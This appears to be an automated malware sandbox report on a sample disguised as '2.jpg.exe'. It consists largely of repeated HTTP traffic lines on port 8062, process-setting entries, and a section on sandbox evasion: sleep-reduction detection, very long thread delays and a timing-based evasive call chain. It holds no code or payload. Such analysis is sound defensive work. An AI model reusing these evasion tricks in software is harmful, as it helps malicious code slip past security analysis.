Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49985

Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06763303		0_2_06763303
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06766BE7		0_2_06766BE7

Source: C:\Users\user\Desktop\2.jpg.exe	Memory allocated: 8F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Memory allocated: 2620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Memory allocated: 4620000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 599324	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597349	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597001	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 595719	Jump to behavior

Source: C:\Users\user\Desktop\2.jpg.exe	Window / User API: threadDelayed 7510			Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Window / User API: threadDelayed 2311			Jump to behavior

Source: C:\Users\user\Desktop\2.jpg.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-37262

Source: C:\Users\user\Desktop\2.jpg.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-36790

Source: C:\Users\user\Desktop\2.jpg.exe

API coverage: 6.7 %

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: 0_2_06766BE7

0_2_06766BE7

Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -23980767295822402s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7336	Thread sleep count: 7510 > 30	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7336	Thread sleep count: 2311 > 30	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -99657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -99532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -99407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -99287s >= -30000s	Jump to behavior
